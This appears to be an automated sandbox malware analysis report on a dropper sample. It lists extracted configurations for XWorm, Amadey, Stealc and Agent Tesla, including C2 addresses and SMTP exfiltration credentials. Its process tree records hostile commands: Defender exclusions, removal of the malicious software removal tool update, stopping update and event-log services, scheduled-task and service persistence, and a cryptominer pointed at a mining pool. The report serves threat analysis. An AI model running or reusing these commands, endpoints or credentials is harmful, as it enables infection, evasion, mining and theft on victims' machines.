Resubmissions
25-06-2024 11:24
240625-nhwp5swhja 1025-06-2024 11:22
240625-ngzemszcrm 324-06-2024 00:56
240624-bamq2s1gma 1023-06-2024 11:27
240623-nkejmsygnf 823-06-2024 11:15
240623-nchw4ayflh 1023-06-2024 11:08
240623-m81w4syerb 1023-06-2024 11:08
240623-m8qq5ssfpn 322-05-2024 09:14
240522-k7dzvaad9z 1021-05-2024 10:21
240521-mdy42aaa2x 1021-05-2024 10:18
240521-mcbx4shg72 10Analysis
-
max time kernel
190s -
max time network
203s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
25-06-2024 11:24
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
xworm
5.0
64.226.123.178:6098
1z0ENxCLSR3XRSre
-
install_file
USB.exe
Extracted
amadey
4.21
0e6740
http://147.45.47.155
-
install_dir
9217037dc9
-
install_file
explortu.exe
-
strings_key
8e894a8a4a3d0da8924003a561cfb244
-
url_paths
/ku4Nor9/index.php
Extracted
stealc
default
http://85.28.47.4
-
url_path
/920475a59bac849d.php
Extracted
agenttesla
Protocol: smtp- Host:
cp8nl.hyperhost.ua - Port:
587 - Username:
[email protected] - Password:
vqpF.#QRT234 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Detect Xworm Payload 1 IoCs
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Stealc
Stealc is an infostealer written in C++.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Stops running service(s) 4 TTPs
-
.NET Reactor proctector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Drops startup file 2 IoCs
-
Executes dropped EXE 33 IoCs
-
Identifies Wine through registry keys 2 TTPs 6 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Loads dropped DLL 2 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 2 IoCs
Detects Themida, an advanced Windows software protection system.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
-
Suspicious use of SetThreadContext 8 IoCs
-
Drops file in Windows directory 1 IoCs
-
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 8 IoCs
-
NSIS installer 2 IoCs
-
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies data under HKEY_USERS 53 IoCs
-
Modifies registry class 1 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 45 IoCs
-
Suspicious use of SendNotifyMessage 40 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
c:\windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files\msa.exe"C:\Users\Admin\AppData\Local\Temp\Files\msa.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"Powershell.exe" -ExecutionPolicy Bypass -command Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Files\msa.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winxs.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files\msa.exe"C:\Users\Admin\AppData\Local\Temp\Files\msa.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exe"C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exe"C:\Users\Admin\AppData\Local\Temp\BLueHvffhw.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\Files\FirstZ.exe"C:\Users\Admin\AppData\Local\Temp\Files\FirstZ.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WSNKISKT"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "WSNKISKT"3⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\Files\amadka.exe"C:\Users\Admin\AppData\Local\Temp\Files\amadka.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000016001\55f76d2d42.exe"C:\Users\Admin\AppData\Local\Temp\1000016001\55f76d2d42.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Users\Admin\AppData\Local\Temp\1000017001\143a41833f.exe"C:\Users\Admin\AppData\Local\Temp\1000017001\143a41833f.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account5⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffa50bc9758,0x7ffa50bc9768,0x7ffa50bc97786⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1544 --field-trial-handle=1880,i,15522250326403440790,8122943675552886652,131072 /prefetch:26⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1796 --field-trial-handle=1880,i,15522250326403440790,8122943675552886652,131072 /prefetch:86⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1688 --field-trial-handle=1880,i,15522250326403440790,8122943675552886652,131072 /prefetch:86⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2836 --field-trial-handle=1880,i,15522250326403440790,8122943675552886652,131072 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2844 --field-trial-handle=1880,i,15522250326403440790,8122943675552886652,131072 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4556 --field-trial-handle=1880,i,15522250326403440790,8122943675552886652,131072 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4892 --field-trial-handle=1880,i,15522250326403440790,8122943675552886652,131072 /prefetch:86⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 --field-trial-handle=1880,i,15522250326403440790,8122943675552886652,131072 /prefetch:86⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4536 --field-trial-handle=1880,i,15522250326403440790,8122943675552886652,131072 /prefetch:86⤵
-
C:\Users\Admin\AppData\Local\Temp\1000020001\num.exe"C:\Users\Admin\AppData\Local\Temp\1000020001\num.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\Files\Chr0me.exe"C:\Users\Admin\AppData\Local\Temp\Files\Chr0me.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Files\228.exe"C:\Users\Admin\AppData\Local\Temp\Files\228.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Descriptions Descriptions.cmd & Descriptions.cmd & exit3⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"4⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c md 3394134⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V "EnquiryAnContributionRefers" Tank4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Ph + Shoot 339413\r4⤵
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\339413\Rent.pif339413\Rent.pif 339413\r4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.14⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe"C:\Users\Admin\AppData\Local\Temp\Files\NBYS%20ASM.NET.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\pt.exe"C:\Users\Admin\AppData\Local\Temp\Files\pt.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\system32\cmd.exe"cmd" /C tasklist3⤵
-
C:\Windows\system32\tasklist.exetasklist4⤵
- Enumerates processes with tasklist
-
C:\Users\Admin\AppData\Local\Temp\Files\%E7%9B%AE%E5%BD%95%E8%A1%A8%E6%A0%BC%E5%90%8D%E5%8D%956001.exe"C:\Users\Admin\AppData\Local\Temp\Files\%E7%9B%AE%E5%BD%95%E8%A1%A8%E6%A0%BC%E5%90%8D%E5%8D%956001.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\newfile_setup.exe"C:\Users\Admin\AppData\Local\Temp\Files\newfile_setup.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe"C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe"C:\Users\Admin\AppData\Local\Temp\Files\zxcvb.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\w.exe"C:\Users\Admin\AppData\Local\Temp\Files\w.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\s.exe"C:\Users\Admin\AppData\Local\Temp\s.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7CB8.tmp.bat""3⤵
-
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"6⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl5⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\inte.exe"C:\Users\Admin\AppData\Local\Temp\Files\inte.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 7643⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 8203⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 8603⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 8403⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 8563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 10843⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 11243⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5412 -s 12643⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\Files\inte.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "inte.exe" /f4⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\Files\qgtplfgy2.exe"C:\Users\Admin\AppData\Local\Temp\Files\qgtplfgy2.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Local\Temp\Files\qgtplfgy2.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Files\123p.exe"C:\Users\Admin\AppData\Local\Temp\Files\123p.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"2⤵
- Executes dropped EXE
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2104.0.263026623\1229574512" -parentBuildID 20221007134813 -prefsHandle 1684 -prefMapHandle 1672 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1d2e851a-c839-4fdb-8f97-3599a93bef61} 2104 "\\.\pipe\gecko-crash-server-pipe.2104" 1776 2bd8bddcb58 gpu3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2104.1.1423504891\692995425" -parentBuildID 20221007134813 -prefsHandle 2096 -prefMapHandle 2092 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {23670088-40b3-4b07-b26f-914690394673} 2104 "\\.\pipe\gecko-crash-server-pipe.2104" 2132 2bd8b8e4158 socket3⤵
- Checks processor information in registry
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2104.2.193900907\1659213740" -childID 1 -isForBrowser -prefsHandle 2904 -prefMapHandle 2900 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1060 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9f5cf88-97d8-4702-8a8f-9c65c654c90d} 2104 "\\.\pipe\gecko-crash-server-pipe.2104" 2916 2bd8fdb4b58 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2104.3.747764488\547259287" -childID 2 -isForBrowser -prefsHandle 3196 -prefMapHandle 3132 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1060 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {990078f5-5627-49a9-bbec-ff633854ffaa} 2104 "\\.\pipe\gecko-crash-server-pipe.2104" 3524 2bd90c9c258 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2104.4.776328869\1248913378" -childID 3 -isForBrowser -prefsHandle 4176 -prefMapHandle 4148 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1060 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {03f68824-9c8d-4b2e-8bb3-72ad86ad34f6} 2104 "\\.\pipe\gecko-crash-server-pipe.2104" 4204 2bd91a86758 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2104.5.1489261787\2087614881" -childID 4 -isForBrowser -prefsHandle 4712 -prefMapHandle 4692 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1060 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0611255a-c246-4434-8a38-ac983ea8c139} 2104 "\\.\pipe\gecko-crash-server-pipe.2104" 4720 2bd903fc158 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2104.6.1341556581\1905462545" -childID 5 -isForBrowser -prefsHandle 4840 -prefMapHandle 4844 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1060 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3fc6c7e-783f-4ecf-91db-38de91223b24} 2104 "\\.\pipe\gecko-crash-server-pipe.2104" 4924 2bd92205e58 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2104.7.106039303\2079617068" -childID 6 -isForBrowser -prefsHandle 5060 -prefMapHandle 5064 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1060 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {14d42147-e23b-406f-bb07-5554900c252c} 2104 "\\.\pipe\gecko-crash-server-pipe.2104" 4720 2bd92208558 tab3⤵
-
